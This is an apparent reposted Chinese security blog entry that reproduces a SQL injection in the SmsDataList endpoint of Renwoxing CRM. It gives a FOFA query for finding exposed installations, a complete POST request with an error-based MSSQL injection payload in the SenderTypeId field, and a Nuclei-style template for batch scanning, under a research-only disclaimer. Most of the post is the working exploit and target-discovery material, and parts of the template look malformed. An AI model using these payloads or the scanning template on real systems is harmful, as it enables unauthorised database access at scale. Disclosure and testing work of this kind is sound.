漏洞简介
任我行CRM是CRM(客户关系管理)、OA(自动化办公)、OM(目标管理)、KM(知识管理)、HR(人力资源)一体化的企业管理软件;任我行 CRMSmsDataList接口存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息
漏洞复现
第一步、使用下面fofa语句进行资产收集,确认测试目标
fofa语句
title="欢迎使用任我行CRM"
第二步、漏洞首页
第三步、使用burp抓取当前页面数据包...将数据包发送到repeater中修改数据包进行测试
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 169
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI
批量脚本
id: renwoxing-CRM-SmsDataList-sqli
info:
name: renwoxing-CRM-SmsDataList-sqli
author: nihao
severity: high
description: 任我行 CRM SmsDataList 存在SQL注入漏洞。
tags: renwoxing,sqli
metadata:
title="欢迎使用任我行CRM" :
http:
raw:
|
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
application/x-www-form-urlencoded :
Host: {{Hostname}}
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI
matchers:
type: dsl
name: sqli
dsl:
"status_code == 200 "
原文始发于微信公众号(揽月安全团队):任我行 CRM SmsDataList SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论